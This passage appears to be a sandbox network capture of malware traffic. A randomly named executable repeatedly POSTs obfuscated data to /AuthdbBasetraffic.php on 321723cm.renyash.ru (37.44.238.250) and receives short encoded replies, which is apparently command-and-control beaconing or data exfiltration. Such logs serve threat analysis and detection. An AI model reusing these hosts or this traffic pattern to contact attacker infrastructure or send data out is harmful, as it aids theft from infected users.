                                                                                                                          Dec 26, 2024 22:33:34.658149004 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:35.027668953 CET2596OUTData Raw: 52 51 58 58 5b 5a 56 5b 5d 58 52 5a 56 5c 54 51 5f 5b 58 47 59 5e 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RQXX[ZV[]XRZV\TQ_[XGY^QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#X,<"[)Z7>-[(?2#/7\&>::&3%3/2+&(/ ].#[(&
                                                                                                                          Dec 26, 2024 22:33:36.021122932 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:36.272212982 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:33 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.44987037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:36.518697023 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:36.871000051 CET2596OUTData Raw: 52 53 5d 59 5e 5d 56 5d 5d 58 52 5a 56 59 54 50 5f 5a 58 40 59 5c 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RS]Y^]V]]XRZVYTP_ZX@Y\Q^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;/!=/#X>5.(-",3Y1[9)\5&)\0<:(7"\+ ].#[(2
                                                                                                                          Dec 26, 2024 22:33:38.166366100 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:38.166526079 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:35 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.44987437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:38.434942007 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          53192.168.2.44987637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:39.090377092 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:39.446805954 CET1924OUTData Raw: 57 5c 5d 5d 5e 5f 56 5e 5d 58 52 5a 56 5b 54 5b 5f 5d 58 47 59 5b 51 53 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W\]]^_V^]XRZV[T[_]XGY[QSPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;?*Z*+?5?<!#,$'=*Z>95]&06&,9(9</ ].#[(:
                                                                                                                          Dec 26, 2024 22:33:40.452033043 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:40.704117060 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 5c 27 2e 30 11 20 3c 09 02 3c 39 0f 0b 22 01 22 42 24 29 3b 1d 2b 3f 21 06 3f 0d 0b 0c 27 04 3d 40 35 11 24 52 3e 32 27 59 2b 36 2b 59 01 1d 23 5f 33 2b 02 5c 25 2a 07 5d 39 01 0d 42 3e 18 22 11 28 29 01 1b 3e 28 39 11 37 32 3d 0c 3f 39 35 03 2e 5a 22 43 2b 0e 2e 0a 33 07 2c 51 02 11 3b 0c 36 0b 2d 51 21 3f 3c 54 29 23 30 01 21 5c 38 56 25 3e 35 57 26 3c 3e 59 30 06 22 59 27 09 33 09 30 5d 26 41 31 0b 27 0e 26 15 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: '\'.0 <<9""B$);+?!?'=@5$R>2'Y+6+Y#_3+\%*]9B>"()>(972=?95.Z"C+.3,Q;6-Q!?<T)#0!\8V%>5W&<>Y0"Y'30]&A1'& ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          54192.168.2.44987737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:39.090409040 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:39.446854115 CET2596OUTData Raw: 57 53 58 59 5e 5f 53 5e 5d 58 52 5a 56 5a 54 5a 5f 53 58 41 59 58 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WSXY^_S^]XRZVZTZ_SXAYXQ^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#,/[?,=6&?<.7?(&X=9>2Y0<><Q9(/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:40.452481031 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:40.704237938 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          55192.168.2.44988237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:40.958658934 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:41.310453892 CET2596OUTData Raw: 52 57 58 5b 5b 5b 56 51 5d 58 52 5a 56 5a 54 55 5f 5c 58 46 59 55 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RWX[[[VQ]XRZVZTU_\XFYUQ]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ,?"]*,8=%(Z=#<3^2-->:%205'/>^+!(? ].#[(
                                                                                                                          Dec 26, 2024 22:33:41.555185080 CET1236OUTData Raw: 07 25 39 00 01 3d 00 43 36 33 14 25 0c 3b 5c 22 36 3f 15 09 3d 56 2e 51 3b 3e 23 2d 2a 22 1e 23 36 5c 0d 2c 39 2c 07 57 3d 03 39 1f 24 00 5a 5e 39 37 33 2a 08 3a 21 01 32 0c 23 51 0f 01 27 1d 3f 30 0d 20 3a 56 1c 26 39 3a 34 3c 3d 05 0d 3b 0c 2d
                                                                                                                          Data Ascii: %9=C63%;\"6?=V.Q;>#-*"#6\,9,W=9$Z^973*:!2#Q'?0 :V&9:4<=;-!=[V;&V3:$8][#26,.(,4!93"(;8$>!1^Y=U:>R!0]#>%>!4*=&-W8>7==;#<;(:1>"\%:?'%$1#\5UV20$98_9989%
                                                                                                                          Dec 26, 2024 22:33:42.340094090 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:42.592180014 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:40 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.2.44988537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:42.835110903 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:43.180342913 CET2596OUTData Raw: 57 56 5d 5e 5b 5f 56 58 5d 58 52 5a 56 54 54 52 5f 59 58 44 59 58 51 59 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WV]^[_VX]XRZVTTR_YXDYXQYPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#_;,2= ):?& $%[==*=]&#6$/?Y?? ].#[(
                                                                                                                          Dec 26, 2024 22:33:44.197362900 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:44.448328972 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:42 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.2.44989137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:44.692125082 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:45.039665937 CET2596OUTData Raw: 57 56 58 5f 5b 5c 53 5b 5d 58 52 5a 56 5c 54 50 5f 53 58 41 59 5d 51 5e 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WVX_[\S[]XRZV\TP_SXAY]Q^PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#^;!>$>&(Y4$'==**>&%['X<%</ ].#[(&
                                                                                                                          Dec 26, 2024 22:33:45.055171013 CET1236OUTData Raw: 07 25 39 00 01 3d 00 43 36 33 14 25 0c 3b 5c 22 36 3f 15 09 3d 56 2e 51 3b 3e 23 2d 2a 22 1e 23 36 5c 0d 2c 39 2c 07 57 3d 03 39 1f 24 00 5a 5e 39 37 33 2a 08 3a 21 01 32 0c 23 51 0f 01 27 1d 3f 30 0d 20 3a 56 1c 26 39 3a 34 3c 3d 05 0d 3b 0c 2d
                                                                                                                          Data Ascii: %9=C63%;\"6?=V.Q;>#-*"#6\,9,W=9$Z^973*:!2#Q'?0 :V&9:4<=;-!=[V;&V3:$8][#26,.(,4!93"(;8$>!1^Y=U:>R!0]#>%>!4*=&-W8>7==;#<;(:1>"\%:?'%$1#\5UV20$98_9989%


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.2.44989537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:45.833058119 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1904
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:46.180263042 CET1904OUTData Raw: 57 5d 5d 5c 5b 5a 53 5b 5d 58 52 5a 56 5b 54 54 5f 5a 58 44 59 5e 51 5b 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]]\[ZS[]XRZV[TT_ZXDY^Q[PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8?"^??'>-[+Z"#Z+_2=!=):'#9Z3/"?7.[? ].#[(:
                                                                                                                          Dec 26, 2024 22:33:47.194811106 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:47.448148012 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 07 25 2d 0e 5d 20 3c 3b 02 2b 5f 2a 1a 21 2f 22 43 24 29 3b 1d 29 2f 22 5b 2b 33 36 1e 24 04 00 19 35 06 30 56 28 0f 23 5d 3e 26 2b 59 01 1d 20 03 33 2b 02 10 25 3a 03 5a 2d 11 0e 19 29 25 2e 5a 3d 29 0a 0e 3d 5d 22 02 20 22 26 53 2a 2a 32 58 39 12 0c 08 3c 30 0f 57 27 2d 2c 51 02 11 38 1d 21 0c 03 1c 22 2c 37 0b 29 0d 27 13 23 2a 0e 19 26 5b 29 1e 30 5a 3e 58 26 3f 36 5a 24 27 0d 08 24 2b 3a 09 31 32 05 0e 25 15 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $%-] <;+_*!/"C$);)/"[+36$50V(#]>&+Y 3+%:Z-)%.Z=)=]" "&S**2X9<0W'-,Q8!",7)'#*&[)0Z>X&?6Z$'$+:12% ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.2.44989637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:45.961767912 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:46.321131945 CET2592OUTData Raw: 57 50 5d 5c 5b 5f 56 5b 5d 58 52 5a 56 5d 54 54 5f 5f 58 44 59 5d 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WP]\[_V[]XRZV]TT__XDY]Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/2Z>,?=69Z+?= ?;_29(:%%39]$/)(2Y(? ].#[(
                                                                                                                          Dec 26, 2024 22:33:47.335033894 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:47.592808962 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.2.44989937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:47.836323023 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:48.180282116 CET2596OUTData Raw: 52 50 58 58 5b 5c 56 59 5d 58 52 5a 56 54 54 51 5f 5f 58 46 59 5d 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RPXX[\VY]XRZVTTQ__XFY]Q_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ,Y9>/;^?5?<*7/+]1.>)[15$/:<Q:X( ].#[(
                                                                                                                          Dec 26, 2024 22:33:49.214905977 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:49.468530893 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          61192.168.2.44990537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:49.743834019 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:50.110115051 CET2596OUTData Raw: 52 51 5d 55 5e 5c 53 5a 5d 58 52 5a 56 5f 54 57 5f 5a 58 49 59 5e 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RQ]U^\SZ]XRZV_TW_ZXIY^QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#]/?>=6!](,5_"? 1[>X="&#9X'%?Q2? ].#[(*
                                                                                                                          Dec 26, 2024 22:33:50.367686033 CET1236OUTData Raw: 07 25 39 00 01 3d 00 43 36 33 14 25 0c 3b 5c 22 36 3f 15 09 3d 56 2e 51 3b 3e 23 2d 2a 22 1e 23 36 5c 0d 2c 39 2c 07 57 3d 03 39 1f 24 00 5a 5e 39 37 33 2a 08 3a 21 01 32 0c 23 51 0f 01 27 1d 3f 30 0d 20 3a 56 1c 26 39 3a 34 3c 3d 05 0d 3b 0c 2d
                                                                                                                          Data Ascii: %9=C63%;\"6?=V.Q;>#-*"#6\,9,W=9$Z^973*:!2#Q'?0 :V&9:4<=;-!=[V;&V3:$8][#26,.(,4!93"(;8$>!1^Y=U:>R!0]#>%>!4*=&-W8>7==;#<;(:1>"\%:?'%$1#\5UV20$98_9989%
                                                                                                                          Dec 26, 2024 22:33:51.094614983 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:51.348165035 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          62192.168.2.44991037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:51.594166040 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
